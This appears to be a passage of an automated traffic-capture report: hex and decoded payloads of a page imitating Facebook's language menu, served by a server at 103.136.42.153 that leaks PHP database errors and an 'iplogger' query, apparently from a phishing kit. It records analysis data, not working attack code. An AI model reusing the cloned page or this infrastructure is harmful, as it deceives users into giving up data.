2022-10-07 13:59:00 UTC	344	IN	Data Raw: 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 Data Ascii: 2520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u0
2022-10-07 13:59:00 UTC	345	IN	Data Raw: 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c Data Ascii: rd:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\
2022-10-07 13:59:00 UTC	347	IN	Data Raw: 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 Data Ascii: 3/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3C
2022-10-07 13:59:00 UTC	348	IN	Data Raw: 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 Data Ascii: 02520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u00
2022-10-07 13:59:00 UTC	350	IN	Data Raw: 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 46 72 65 6e 63 68 20 28 46 72 61 6e 63 65 29 22 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 Data Ascii: t_selector", 1); return false;" title="French (France)">Franais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprec
2022-10-07 13:59:00 UTC	351	IN	Data Raw: 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 69 74 5f 49 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 Data Ascii: nclick="require("IntlUtils").setCookieLocale("it_IT", "en_US", "https:\/\/it-it.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Th
2022-10-07 13:59:00 UTC	353	IN	Data Raw: 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 30 30 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 Data Ascii: \u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523000000\u002522\u00253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520
2022-10-07 13:59:00 UTC	354	IN	Data Raw: 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 Data Ascii: 39;dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_q
2022-10-07 13:59:00 UTC	356	IN	Data Raw: 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 Data Ascii: 253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u002520deni
2022-10-07 13:59:00 UTC	357	IN	Data Raw: 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 66 66 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 35 42 54 45 50 5c 75 30 30 32 35 32 30 53 54 4f 50 5c 75 30 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 Data Ascii: 0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523ff0000\u002522\u00253E\u00255BTEP\u002520STOP\u00255D\u00253C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cb
2022-10-07 13:59:00 UTC	358	IN	Data Raw: 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 Data Ascii: 039;dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cf
2022-10-07 13:59:00 UTC	360	IN	Data Raw: 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 Data Ascii: 00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resource,\u00252
2022-10-07 13:59:00 UTC	361	IN	Data Raw: 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f Data Ascii: sql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/
2022-10-07 13:59:00 UTC	363	IN	Data Raw: 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 Data Ascii: \/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520ins
2022-10-07 13:59:00 UTC	364	IN	Data Raw: 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 Data Ascii: 50A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520
2022-10-07 13:59:00 UTC	366	IN	Data Raw: 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 Data Ascii: E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%
2022-10-07 13:59:00 UTC	367	IN	Data Raw: 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c Data Ascii: 2520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\
2022-10-07 13:59:00 UTC	369	IN	Data Raw: 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 Data Ascii: u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/font\u00253E", "www_list_selector", 6); return false;" title="Turkish">Trke</a></li><li><a class="_sv
2022-10-07 13:59:00 UTC	370	IN	Data Raw: 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 61 72 5f 41 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a Data Ascii: 3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("ar_AR", "en_US", "https:
2022-10-07 13:59:00 UTC	372	IN	Data Raw: 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 Data Ascii: 20be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr
